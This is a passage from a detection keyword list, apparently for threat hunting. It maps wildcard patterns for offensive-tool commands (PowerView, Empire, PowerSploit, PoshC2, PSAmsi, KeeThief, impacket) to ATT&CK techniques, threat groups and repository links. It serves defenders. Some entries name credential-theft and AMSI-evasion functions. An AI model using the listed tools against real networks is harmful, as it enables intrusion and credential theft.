T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-ComputerDetails.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*FindAdminAccessComputers*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*Find-AdminLogonScripts.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*find-allvulns*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Find-AmsiAstSignatures -*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Find-AmsiPSTokenSignatures -*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Find-AmsiSignatures.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Find-AppLockerLogs*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-ComputerDetails.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-AVSignature*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*findDelegation.py -dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*findDelegation.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Find-DomainShare -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-DomainShare -CheckShareAccess*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-Fruit.*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Find-Fruit.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-Fruit.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1108,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*findgpocomputeradmin*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Find-GPOComputerAdmin*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Find-GPOComputerAdmin*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Find-InterestingDomainAcl*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement Enumeration With PowerView,T1595 - T1590 - T1591 - T1213 - T1039 - T1592,N/A,N/A,N/A,Lateral movement,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Find-InterestingDomainAcl*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Find-InterestingDomainAcl*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*findinterestingdomainsharefile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Find-InterestingDomainShareFile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Find-InterestingDomainShareFile*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*find-interestingfile -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Find-InterestingFile*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Find-KeePassconfig*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-KeePassconfig*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*Find-LocalAdminAccess -Verbose*,greyware_tool_keyword,powershell,Find machine where the user has admin privs,T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*findlocaladminaccess*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*findlocaladminaccess*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 